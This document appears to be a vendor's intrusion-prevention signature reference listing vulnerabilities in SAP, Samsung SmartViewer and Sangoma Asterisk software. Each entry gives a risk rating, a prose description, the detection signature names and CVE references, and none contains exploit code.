References:

CVE-2015-8039
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8039

Samsung-Smartviewer-Stwaxconfignvr-Memory-Corruption

About this vulnerability:

A vulnerability in Samsung SmartViewer

Risk:

Moderate

First detected in:

sgpkg-ips-704-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Samsung SmartViewer

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Samsung SmartViewer. A remote attacker can use this to execute arbitrary code in the context of the current user.

Situation:

File-Text_Samsung-Smartviewer-Stwaxconfignvr-Memory-Corruption

References:

CVE-2015-8039
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8039

Sangoma-Asterisk-Command-Execution

About this vulnerability:

A vulnerability in Sangoma Asterisk

Risk:

High

First detected in:

sgpkg-ips-1224-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Sangoma Asterisk

Type:

Input Validation

Description:

There exists a vulnerability in Sangoma Asterisk, multiple versions, which allows remote attackers to execute arbitrary code as the user running Asterisk, due to the insufficient validation of requests to the Asterisk Manager Interface.

Situation:

Generic_CS-Sangoma-Asterisk-Command-Execution

References:

CVE-2019-18610
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18610

SAP-3d-Visual-Enterprise-Viewer-3dm-File-Buffer-Overflow

About this vulnerability:	A vulnerability in SAP 3D Visual Enterprise Viewer
Risk:	Moderate
First detected in:	sgpkg-ips-704-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	SAP 3D Visual Enterprise Viewer
Type:	Buffer Overflow
Description:	SAP 3D Visual Enterprise Viewer has a buffer overflow vulnerability in the 3DM file parser, which allows an attacker to run code with the privileges of the logged-on user.
Situation:	File-Binary_SAP-3d-Visual-Enterprise-Viewer-3dm-File-Buffer-Overflow

SAP-3d-Visual-Enterprise-Viewer-Flic-Animation-Buffer-Overflow

About this vulnerability:	A vulnerability in SAP 3D Visual Enterprise Viewer
Risk:	Moderate
First detected in:	sgpkg-ips-700-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	SAP 3D Visual Enterprise Viewer
Type:	Buffer Overflow
Description:	A crafted FLIC file may be used to cause a buffer overflow in the SAP 3D Visual Enterprise Viewer application, allowing unauthorized code execution.
Situation:	File-Binary_SAP-3d-Visual-Enterprise-Viewer-Flic-Animation-Buffer-Overflow

SAP-Business-One-License-Manager-Buffer-Overflow

About this vulnerability:

A SAP Business One License Manager Buffer Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-721-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

SAP License Manager

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in SAP Business One License Manager 2005, versions 6.80.123 and 6.80.320, which allows remote attackers to execute arbitrary code via a long GIOP request to TCP port 30000.

Situation:

Generic_CS-SAP-Business-One-License-Manager-Buffer-Overflow
Generic_CS-SAP-Business-One-License-Manager-Buffer-Overflow-2

References:

CVE-2009-4988
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4988

BID-35933
http://www.securityfocus.com/bid/35933

OSVDB-56837
http://www.osvdb.org/56837

SAP-Crystal-Reports-2008-Directory-Traversal

About this vulnerability:

A vulnerability in SAP Crystal Reports Server

Risk:

High

First detected in:

sgpkg-ips-375-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Crystal Reports Server

Type:

Directory Traversal

Description:

An information disclosure vulnerability has been reported in SAP Crystal Reports 2008. The vulnerability is due to insufficient input validation of user input in one of the installed Java Server Pages (JSPs). Remote authenticated attackers may exploit this vulnerability by sending specially crafted HTTP requests to the affected JSP file on the target server. Successful exploitation would allow the attackers to read the content of arbitrary files on the target host.

Situation:

HTTP_CRL-SAP-Crystal-Reports-2008-Directory-Traversal

References:

BID-45980
http://www.securityfocus.com/bid/45980

SAP-Crystal-Reports-Printcontrol.dll-ActiveX-Control-Buffer-Overflow

About this vulnerability:

A vulnerability in SAP Crystal Reports

Risk:

Moderate

First detected in:

sgpkg-ips-415-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Crystal Reports

Type:

Buffer Overflow

Description:

A heap buffer overflow vulnerability exists in SAP Crystal Reports PrintControl.dll ActiveX Control. The vulnerability is due to a boundary error when parsing the ServerResourceVersion property. A remote attacker can leverage this vulnerability by enticing a target user to open a malicious web page. Successful exploitation would allow an attacker to execute arbitrary code in the security context of the logged in user. An unsuccessful attack could cause an abnormal termination of the affected browser.

Situation:

File-Text_SAP-Crystal-Reports-Printcontrol.dll-ActiveX-Control-Buffer-Overflow

References:

CVE-2010-2590
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2590

BID-45387
http://www.securityfocus.com/bid/45387

OSVDB-69917
http://www.osvdb.org/69917

SAP-Gateway-Remote-Code-Execution

About this vulnerability:	An attempt to exploit a misconfigured ACL leading to remote code execution detected
Risk:	High
First detected in:	sgpkg-ips-1156-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	SAP
Type:	Malfunction
Description:	There has been reported that misconfigured ACLs could be used to achieve remote code execution on SAP Gateway systems.
Situation:	Generic_CS-SAP-Gateway-Remote-Code-Execution

SAP-GUI-Arbitrary-File-Download

About this vulnerability:

A SAP GUI Arbitrary File Download vulnerability

Risk:

High

First detected in:

sgpkg-ips-800-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SAP GUI

Type:

Configuration Error

Description:

A vulnerability in SAP GUI, versions 6.40 Patch 29 (KWEDIT.DLL 6400.1.1.41) and 7.10 Patch 5 (KWEDIT.DLL 7100.1.1.43), which allows remote attackers to overwrite arbitrary files via the "Comp_Download" method.

Situation:

File-Text_SAP-GUI-Arbitrary-File-Download

References:

CVE-2008-4830
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4830

OSVDB-53680
http://www.osvdb.org/53680

SAP-GUI-Regsvr32.exe-Rule-Security-Policy-Bypass

About this vulnerability:

A vulnerability in SAP GUI

Risk:

Moderate

First detected in:

sgpkg-ips-880-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SAP GUI

Type:

Malfunction

Description:

Improper implementation of policy enforcement causes a policy bypass vulnerability in the SAP GUI. A successful exploitation can allow an attacker to execute code remotely with the privileges of the affected application.

Situation:

Generic_CS-SAP-GUI-Regsvr32.exe-Rule-Security-Policy-Bypass

References:

CVE-2017-6950
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6950

BID-96872
http://www.securityfocus.com/bid/96872

SAP-GUI-SAPBExCommonResources-ActiveX-Command-Execution

About this vulnerability:	A vulnerability in SAP GUI
Risk:	High
First detected in:	sgpkg-ips-297-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	SAP GUI
Type:	Malfunction
Description:	There is a vulnerability in the SAP GUI SAPBExCommonResources ActiveX control. The vulnerability is due to a design weakness in the Execute() function of the ActiveX Object BExGlobal. This may allow remote attackers to execute arbitrary commands by enticing the target user to open a maliciously crafted HTML document.
Situation:	HTTP_SS-SAP-GUI-SAPBExCommonResources-ActiveX-Command-Execution File-Text_SAP-GUI-SAPBExCommonResources-ActiveX-Command-Execution

SAP-GUI-Webviewer3d-ActiveX-Control-Arbitrary-File-Overwrite

About this vulnerability:

A file overwrite vulnerability in SAP GUI WebViewer3D ActiveX Control

Risk:

Moderate

First detected in:

sgpkg-ips-254-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

SAP GUI

Type:

Input Validation

Description:

There is a file overwrite vulnerability in SAP GUI WebViewer3D ActiveX Control. A remote attacker can exploit this vulnerability by enticing a target user to open a malicious web page in Internet Explorer to create or modify arbitrary files. If important system files are overwritten, the system may become non-bootable. By writing a file to the Startup folder, arbitrary code can be executed during the next reboot or logon session.

Situation:

HTTP_SS-SAP-GUI-Webviewer3d-ActiveX-Control-Arbitrary-File-Overwrite
HTTP_SS-SAP-GUI-Webviewer3d-ActiveX-Control-Arbitrary-File-Overwrite-Exploit
File-Text_SAP-GUI-Webviewer3d-ActiveX-Control-Arbitrary-File-Overwrite
File-Text_SAP-GUI-Webviewer3d-ActiveX-Control-Arbitrary-File-Overwrite-Exploit

References:

BID-34310
http://www.securityfocus.com/bid/34310

OSVDB-58379
http://www.osvdb.org/58379

SAP-Internet-Communication-Manager-HTTP-Request-Smuggling

About this vulnerability:

A vulnerability in SAP Internet Communication Manager.

Risk:

High

First detected in:

sgpkg-ips-1455-5242

Last changed:

sgpkg-ips-1833-5242

Platform:

Windows

Software:

SAP

Type:

Input Validation

Description:

A vulnerability in SAP Internet Communication Manager (ICM), in multiple versions of SAP NetWeaver (Java and ABAP) and SAP Web Dispatcher, which allows remote attackers access to confidential information, passwords and session cookies, and possibly gain unrestricted access to the system by sending a crafted request to the target server, due to improper input validation.

Situation:

HTTP_CS-SAP-Internet-Communication-Manager-HTTP-Request-Smuggling
HTTP_CSH-SAP-Internet-Communication-Manager-HTTP-Request-Smuggling

References:

CVE-2022-22536
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22536

SAP-Internet-Graphics-Server-XMLCHART-Xxe

About this vulnerability:

A vulnerability in SAP Internet Graphics Servers.

Risk:

High

First detected in:

sgpkg-ips-1430-5242

Last changed:

sgpkg-ips-1430-5242

Platform:

Generic

Software:

SAP Internet Graphics Server

Type:

Input Validation

Description:

A vulnerability in SAP Internet Graphics Servers, versions 7.20, 7.20EXT, 7.45, 7.49, or 7.53, which allows remote attackers to disclose information due to a lack of validation on the Extension HTML tag when submitting a POST request to the XMLCHART page.

Situation:

HTTP_CS-SAP-Internet-Graphics-Server-XMLCHART-Xxe

References:

CVE-2018-2392
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2392

SAP-Netweaver-Adiexecblkconv-Message-Server-Buffer-Overflow

About this vulnerability:

A vulnerability in SAP NetWeaver

Risk:

Moderate

First detected in:

sgpkg-ips-514-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SAP NetWeaver

Type:

Buffer Overflow

Description:

There is a code execution vulnerability in SAP NetWeaver Message Server. The vulnerability is due to a buffer overflow in the function AdIExecBlkConv while handling a request message. A remote attacker can exploit this vulnerability by sending a specially crafted message to a vulnerable server. This can lead to code execution in the context of the affected service. If code execution is unsuccessful, the service may terminate unexpectedly.

Situation:

Generic_CS-SAP-Netweaver-Adiexecblkconv-Message-Server-Buffer-Overflow

References:

CVE-2013-1593
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1593

OSVDB-90237
http://www.osvdb.org/90237

SAP-Netweaver-Application-Server-Directory-Traversal-CVE-2017-12637

About this vulnerability:

A vulnerability in SAP NetWeaver

Risk:

High

First detected in:

sgpkg-ips-1857-5242

Last changed:

sgpkg-ips-1857-5242

Platform:

Generic

Software:

SAP NetWeaver

Type:

Directory Traversal

Description:

A directory traversal vulnerability in SAP NetWeaver Application Server Java 7.5 allows unauthenticated attackers to read arbitrary files via a crafted URL query string. Successful exploitation could lead to the disclosure of sensitive information.

Situation:

HTTP_CSU-SAP-Netweaver-Application-Server-Directory-Traversal-CVE-2017-12637

References:

CVE-2017-12637
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12637

SAP-Netweaver-As-Java-CRM-Remote-Code-Execution

About this vulnerability:

An attempt to exploit a vulnerability in SAP NetWeaver AS JAVA CRM detected

Risk:

High

First detected in:

sgpkg-ips-1405-5242

Last changed:

sgpkg-ips-1405-5242

Platform:

Generic

Software:

SAP NetWeaver

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in SAP NetWeaver AS JAVA CRM detected.

Situation:

HTTP_CSU_SAP-Netweaver-As-Java-CRM-Remote-Code-Execution

References:

CVE-2018-2380
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2380

SAP-Netweaver-As-Java-XML-External-Entity

About this vulnerability:

An attempt to exploit a vulnerability in SAP NetWeaver AS JAVA detected

Risk:

High

First detected in:

sgpkg-ips-1404-5242

Last changed:

sgpkg-ips-1404-5242

Platform:

Generic

Software:

SAP NetWeaver

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in SAP NetWeaver AS JAVA detected.

Situation:

HTTP_CRL-SAP-Netweaver-As-Java-XML-External-Entity

References:

CVE-2016-9563
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9563

SAP-Netweaver-CVE-2020-6287

About this vulnerability:

A vulnerability in SAP NetWeaver

Risk:

Moderate

First detected in:

sgpkg-ips-1267-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SAP NetWeaver

Type:

Malfunction

Description:

There exists an authentication check vulnerability in SAP NetWeaver. Successful exploitation allows an attacker to create an administrator user or normal user to the target system.

Situation:

File-TextId_SAP-Netweaver-CVE-2020-6287

References:

CVE-2020-6287
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6287

SAP-Netweaver-Diagieventsource-Denial-Of-Service

About this vulnerability:

A vulnerability in SAP NetWeaver

Risk:

High

First detected in:

sgpkg-ips-456-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SAP NetWeaver

Type:

Malfunction

Description:

There is a denial-of-service vulnerability in SAP NetWeaver's Dispatcher service. The vulnerability is due to insufficient validation while parsing incoming requests. The vulnerable "Dispatcher" service by default listens on port TCP/32## (where ## is the SAP system number). A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted SAP Diag packet to the vulnerable "Dispatcher" service. Successful exploitation can result in a denial of service condition.

Situation:

Generic_CS-SAP-Netweaver-Diagieventsource-Denial-Of-Service

References:

CVE-2012-2514
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2514

OSVDB-81760
http://www.osvdb.org/81760

SAP-Netweaver-Diagtracehex-Denial-Of-Service

About this vulnerability:

A vulnerability in SAP NetWeaver

Risk:

Moderate

First detected in:

sgpkg-ips-455-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SAP NetWeaver

Type:

Malfunction

Description:

There is a denial-of-service vulnerability in SAP NetWeaver's Dispatcher service. The vulnerability is due to insufficient validation while parsing incoming requests. The vulnerable "Dispatcher" service listens on port TCP/32## (where ## stands for the SAP system number) by default. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted SAP Diag packet to the vulnerable "Dispatcher" service. Successful exploitation can result in a denial-of-service condition.

Situation:

Generic_CS-SAP-Netweaver-Diagtracehex-Denial-Of-Service

References:

CVE-2012-2612
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2612

OSVDB-81760
http://www.osvdb.org/81760

SAP-Netweaver-Directory-Traversal

About this vulnerability:

A vulnerability in SAP NetWeaver

Risk:

Moderate

First detected in:

sgpkg-ips-1265-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SAP NetWeaver

Type:

Malfunction

Description:

Improper handling of request data causes a directory traversal vulnerability in SAP NetWeaver. A successful exploit allows an attacker to download files from the target system.

Situation:

File-TextId_SAP-Netweaver-Directory-Traversal

References:

CVE-2020-6286
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6286

SAP-Netweaver-Dispatcher-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in SAP NetWeaver

Risk:

Moderate

First detected in:

sgpkg-ips-455-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SAP NetWeaver

Type:

Buffer Overflow

Description:

There is a stack-based buffer overflow vulnerability in SAP NetWeaver's Dispatcher service. The vulnerability is due to insufficient bounds checking while parsing incoming requests. This service listens by default on port TCP/32## (being ## the SAP system number) of a host running the "Dispatcher" service. A remote unauthenticated attacker can exploit this vulnerability by sending a specially crafted SAP Diagnostic packet to the vulnerable "Dispatcher" service. Successful exploitation can result in code execution in the context of the affected service. If code execution is unsuccessful, the affected service may terminate abnormally.

Situation:

Generic_CS-SAP-Netweaver-Dispatcher-Stack-Buffer-Overflow

References:

CVE-2012-2611
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2611

OSVDB-81759
http://www.osvdb.org/81759

SAP-Netweaver-Enqueue-Server-DoS

About this vulnerability:	SAP Netweaver Enqueue Server Trace Pattern Denial of Service Vulnerability
Risk:	High
First detected in:	sgpkg-ips-627-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	SAP NetWeaver
Type:	Malfunction
Description:	A vulnerability SAP Netweaver that could allow a remote attacker to create a denial of service condition via a specially crafted SAP Enqueue Server packet.
Situation:	Generic_CS-SAP-Netweaver-Enqueue-Server-DoS

SAP-Netweaver-File-Upload-Vulnerability-CVE-2021-38163

About this vulnerability:

A vulnerability in SAP NetWeaver

Risk:

High

First detected in:

sgpkg-ips-1673-5242

Last changed:

sgpkg-ips-1673-5242

Platform:

Generic

Software:

SAP NetWeaver

Type:

Input Validation

Description:

An unrestricted file upload vulnerability has been reported in SAP NetWeaver Visual Composer. A remote, authenticated attacker can use this to upload arbitrary files on the affected system, which may lead to arbitrary code execution with the Java Server process privileges.

Situation:

HTTP_CSU-SAP-Netweaver-File-Upload-Vulnerability-CVE-2021-38163

References:

CVE-2021-38163
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38163

SAP-Netweaver-Information-Disclosure

About this vulnerability:

A SAP Netweaver Information Disclosure vulnerability.

Risk:

High

First detected in:

sgpkg-ips-704-5211

Last changed:

sgpkg-ips-1720-5242

Platform:

Generic

Software:

SAP NetWeaver

Type:

Input Validation

Description:

A vulnerability in SAP Netweaver 7.03, in the HostControl service, which allows remote attackers to obtain sensitive information via a crafted SOAP request.

Situation:

File-TextId_SAP-Netweaver-Information-Disclosure

References:

CVE-2013-3319
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3319

BID-61402
http://www.securityfocus.com/bid/61402

OSVDB-95616
http://www.osvdb.org/95616

SAP-Netweaver-Invoker-Servlet-Remote-Code-Execution

About this vulnerability:

An attempt to exploit a vulnerability in SAP NetWeaver detected

Risk:

High

First detected in:

sgpkg-ips-1403-5242

Last changed:

sgpkg-ips-1403-5242

Platform:

Windows

Software:

SAP NetWeaver

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in SAP NetWeaver detected.

Situation:

HTTP_CSU-SAP-Netweaver-Invoker-Servlet-Remote-Code-Execution

References:

CVE-2010-5326
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5326

SAP-Netweaver-Message-Server-Memory-Corruption

About this vulnerability:

A vulnerability in SAP NetWeaver

Risk:

High

First detected in:

sgpkg-ips-513-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SAP NetWeaver

Type:

Malfunction

Description:

A code execution vulnerability has been reported in SAP NetWeaver Message Server. The vulnerability is due to an array index error in the function _MsJ2EE_AddStatistics(). A remote attacker can exploit this vulnerability by sending a specially crafted message to a vulnerable server. This can lead to code execution in the context of the affected service. If code execution is unsuccessful, the service may terminate abnormally.

Situation:

Generic_CS-SAP-Netweaver-Message-Server-Memory-Corruption

References:

CVE-2013-1592
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1592

OSVDB-90238
http://www.osvdb.org/90238

SAP-Netweaver-Soap-Interface-Arbitrary-Command-Execution

About this vulnerability:	A vulnerability in SAP NetWeaver
Risk:	High
First detected in:	sgpkg-ips-471-5211
Last changed:	sgpkg-ips-1453-5242
Platform:	Generic
Software:	SAP NetWeaver
Type:	Input Validation
Description:	A remote command execution vulnerability has been reported in SAP NetWeaver's SOAP interface. The vulnerability is due to insufficient validation of incoming SOAP requests. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted SOAP request to the affected service. This can result in arbitrary command execution in the security context of the Administrator user.
Situation:	File-TextId_SAP-Netweaver-Soap-Interface-Arbitrary-Command-Execution

SAP-Netweaver-Soap-Request-Sxpg_Call_System-Command-Execution

About this vulnerability:

A vulnerability in SAP NetWeaver

Risk:

Moderate

First detected in:

sgpkg-ips-531-5211

Last changed:

sgpkg-ips-1453-5242

Platform:

Generic

Software:

SAP NetWeaver

Type:

Input Validation

Description:

A remote command execution vulnerability has been reported in SAP NetWeaver's SOAP interface. The vulnerability is due to insufficient validation of incoming SOAP requests. A remote, authenticated attacker can exploit this vulnerability by sending a specially crafted SOAP request to the affected service. This can result in arbitrary command execution in the security context of the affected service.

Situation:

File-TextId_SAP-Netweaver-Soap-Request-Sxpg_Call_System-Command-Execution

References:

OSVDB-93537
http://www.osvdb.org/93537

SAP-Netweaver-Soap-Request-Sxpg_Command_Execute-Command-Execution

About this vulnerability:

A vulnerability in SAP NetWeaver

Risk:

Moderate

First detected in:

sgpkg-ips-531-5211

Last changed:

sgpkg-ips-1453-5242

Platform:

Generic

Software:

SAP NetWeaver

Type:

Input Validation

Description:

References:

OSVDB-93536
http://www.osvdb.org/93536

SAP-Netweaver-SQL-Injection-CVE-2016-2386

About this vulnerability:

A vulnerability in SAP NetWeaver

Risk:

High

First detected in:

sgpkg-ips-1478-5242

Last changed:

sgpkg-ips-1478-5242

Platform:

Generic

Software:

SAP NetWeaver

Type:

Input Validation

Description:

An SQL injection vulnerability has been reported in the SAP NetWeaver J2EE Engine 7.40. This vulnerability affects SAP NetWeaver AS Java UDDI server versions 7.11-7.50. A successful exploit allows an unauthenticated attacker to run arbitrary SQL commands.

Situation:

File-TextId_SAP-Netweaver-SQL-Injection-CVE-2016-2386

References:

CVE-2016-2386
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2386

SAP-Netweaver-Suspicious-Probe-Request

About this vulnerability:	A vulnerability in SAP NetWeaver
Risk:	Moderate
First detected in:	sgpkg-ips-1267-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	SAP NetWeaver
Type:	Malfunction
Description:	This situation detects suspicious probe against SAP Netviewer that is used to exploit vulnerabilities CVE-2020-6286 and CVE-2020-6287.
Situation:	HTTP_CSU-SAP-Netweaver-Suspicious-Probe-Request

SAP-Netweaver-Visual-Composer-Arbitrary-File-Upload-CVE-2025-31324

About this vulnerability:

A vulnerability in SAP NetWeaver

Risk:

Critical

First detected in:

sgpkg-ips-1873-5242

Last changed:

sgpkg-ips-1873-5242

Platform:

Generic

Software:

SAP NetWeaver

Type:

Malfunction

Description:

An unauthenticated arbitrary file upload vulnerability has been reported in the Metadata Uploader component of the SAP NetWeaver Visual Composer. Successfully exploiting this vulnerability allows remote code execution and can lead to a full system compromise.

Situation:

HTTP_CSU-SAP-Netweaver-Visual-Composer-CVE-2025-31324-WebShell-Activity
File-Text_SAP-Netweaver-Visual-Composer-Arbitrary-File-Upload-CVE-2025-31324
File-Name_SAP-Netweaver-Visual-Composer-Arbitrary-File-Upload-CVE-2025-31324

References:

CVE-2025-31324
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-31324

SAP-Soap-Information-Disclosure

About this vulnerability:

A SAP Soap Information Disclosure vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-731-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SAP SOAP

Type:

Insecure Configuration

Description:

A vulnerability in the SAP SOAP service which allows remote attackers to obtain sensitive material via an RFC_SYSTEM_INFO request.

Situation:

HTTP_CRL-SAP-Soap-Information-Disclosure

References:

CVE-2006-6010
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6010

SAP-Solution-Manager-Remote-Command-Execution

About this vulnerability:

A vulnerability in SAP Solution Manager.

Risk:

High

First detected in:

sgpkg-ips-1369-5242

Last changed:

sgpkg-ips-1753-5242

Platform:

Linux; Windows

Software:

SAP Solution Manager

Type:

Input Validation

Description:

A vulnerability in SAP Solution Manager, version 7.2, which allows unauthenticated remote attackers to execute arbitrary OS commands due to the missing authentication checks when submitting a SOAP request to the /EemAdminService/EemAdmin page.

Situation:

HTTP_CS-SAP-Solution-Manager-Remote-Command-Execution
File-TextId_SAP-Solution-Manager-Missing-Authentication-Check-EEM-Servlet-Access

References:

CVE-2020-6207
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6207

SAP-SQL-Anywhere-.NET-Data-Provider-Column-Alias-Buffer-Overflow

About this vulnerability:

A vulnerability in SAP SQL Anywhere

Risk:

High

First detected in:

sgpkg-ips-629-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SAP SQL Anywhere

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in SAP SQL Anywhere .NET Data Provider. The vulnerability is caused by insufficient boundary checks in the handling of column aliases. If an application allows untrusted input to be used as the column alias in an SQL query, by sending crafted requests to the application, an attacker can overflow a stack-based buffer. This could possibly lead to arbitrary code execution in the context of the application.

Situation:

HTTP_CRL-SAP-SQL-Anywhere-.NET-Data-Provider-Column-Alias-Buffer-Overflow

References:

CVE-2014-9264
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9264

OSVDB-115624
http://www.osvdb.org/115624

SAP-SQL-Anywhere-.NET-Malformed-Integer-Buffer-Overflow

About this vulnerability:

A vulnerability in SAP SQL Anywhere

Risk:

High

First detected in:

sgpkg-ips-633-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SAP SQL Anywhere

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in SAP SQL Anywhere .NET Data Provider. The vulnerability is caused by insufficient boundary checks in the handling of malformed integers. If an application allows untrusted input to be used as an integer constant in an SQL query, by sending crafted requests to the application, an attacker can overflow a stack-based buffer. This could possibly lead to arbitrary code execution in the context of the application.

Situation:

HTTP_CRL-SAP-SQL-Anywhere-.NET-Malformed-Integer-Buffer-Overflow

References:

CVE-2014-9264
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9264

OSVDB-115627
http://www.osvdb.org/115627

SAP-Sybase-Esp-Parse-Unsafe-Pointer-Dereference

About this vulnerability:

A vulnerability in SAP Sybase Event Stream Processor (ESP) Studio

Risk:

High

First detected in:

sgpkg-ips-592-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Sybase Event Stream Processor Studio

Type:

Malfunction

Description:

Six unsafe pointer dereference vulnerabilities have been reported in SAP Sybase Event Stream Processor (ESP). These vulnerabilities are caused by the listening service accepting unsanitized pointers in XMLRPC requests. By sending crafted requests to a vulnerable server, a remote attacker can leverage this vulnerability to execute arbitrary code under the context of the current process.

Situation:

Generic_CS-SAP-Sybase-Esp-Parse-Unsafe-Pointer-Dereference

References:

CVE-2014-3457
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3457

OSVDB-107276
http://www.osvdb.org/107276

OSVDB-107260
http://www.osvdb.org/107260

SAP-Sybase-Event-Stream-Processor-Esp_Parse-Connection-Vulnerability

About this vulnerability:

A vulnerability in SAP Sybase Event Stream Processor (ESP)

Risk:

High

First detected in:

sgpkg-ips-595-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Sybase Event Stream Processor Studio

Type:

Malfunction

Description:

Two unsafe pointer dereference vulnerabilities have been reported in SAP Sybase Event Stream Processor (ESP). These vulnerabilities are caused by the listening service accepting unsanitized pointers in XMLRPC requests. By sending crafted requests to a vulnerable server, an remote attacker can cause the service to terminate resulting in a denial of service condition.

Situation:

Generic_CS-SAP-Sybase-Event-Stream-Processor-Esp_Parse-Connection-Vulnerability

References:

CVE-2014-3458
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3458

OSVDB-107262
http://www.osvdb.org/107262

SAP-Sybase-Event-Stream-Processor-Parse-Connection-Unsafe-Pointer-Dereference

About this vulnerability:

A vulnerability in SAP Sybase Event Stream Processor (ESP)

Risk:

Moderate

First detected in:

sgpkg-ips-595-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Sybase Event Stream Processor Studio

Type:

Malfunction

Description:

Five unsafe pointer dereference vulnerabilities have been reported in SAP Sybase Event Stream Processor (ESP). These vulnerabilities are caused by the listening service accepting unsanitized pointers in XMLRPC requests. By sending crafted requests to a vulnerable server, an remote attacker can leverage this vulnerability to execute arbitrary code under the context of the current process.

Situation:

Generic_CS-SAP-Sybase-Event-Stream-Processor-Esp_Parse-Connection-Unsafe-Pointer-Dereference

References:

CVE-2014-3457
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3457

OSVDB-107270
http://www.osvdb.org/107270

SAPGUI-AddTab-Method-ActiveX-Control-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in SAP GUI

Risk:

Moderate

First detected in:

sgpkg-ips-198-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

SAP GUI

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in the SAP GUI. Remote attackers can exploit this vulnerability by persuading a target user to visit a specially crafted web page. As a result of processing the malicious command, a heap-based buffer overflow can be triggered which may result in injection and execution of arbitrary code with privileges of the currently logged on user

Situation:

HTTP_SAP-GUI-ActiveX-Control-Buffer-Overflow
File-Text_SAP-GUI-ActiveX-Control-Buffer-Overflow

References:

CVE-2008-4827
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4827

BID-33148
http://www.securityfocus.com/bid/33148

SAP_SAP-License-Manager-2005-Buffer-Overflow

About this vulnerability:	A vulnerability in SAP License Manager
Risk:	High
First detected in:	sgpkg-ips-237-3038
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	SAP License Manager
Type:	Buffer Overflow
Description:	NT_Naming_Service.exe in License Manager 2005 for SAP Business One 2005-A is vulnerable to a stack-based buffer overflow allowing for full system compromise by an unauthenticated user that has TCP/IP access to SAP's license service on TCP port 30000.
Situation:	Generic_SAP-License-Manager-2005-Buffer-Overflow

